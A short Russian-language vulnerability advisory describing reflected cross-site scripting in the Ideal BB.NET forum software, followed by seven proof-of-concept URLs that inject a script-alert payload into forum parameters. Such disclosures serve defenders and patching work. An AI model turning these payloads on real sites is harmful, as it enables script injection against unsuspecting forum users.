Программа: Ideal BB.NET 1.3, 2.0.31.11

Удаленный пользователь может произвести XSS нападение. Уязвимость существует при
обработке входных данных в параметрах "forumID", "boardID", "postID", "catID" и
"memberID" перед выводом информации в браузер жертвы на странице стандартной
ошибки ("/ibb/errors/Error.aspx").Удаленный пользователь может с помощью
специально сформированного URL выполнить произвольный HTML код в браузере жертвы
в контексте безопасности уязвимого сайта.

Пример:

/topics.aspx?forumID=59%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

/categoryindex.aspx?boardID=1%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

/topics.aspx?date=12/05/2005&boardID=
1%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

/posts.aspx?postID=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

/forums.aspx?catID=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

/member.aspx?memberID=%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

/topics.aspx?forumID=54&topicRepeater1-p=
%22%3E%3Cscript%3Ealert('r0t')%3C/script%3E

 

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

    • Открыть комментарии
    Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии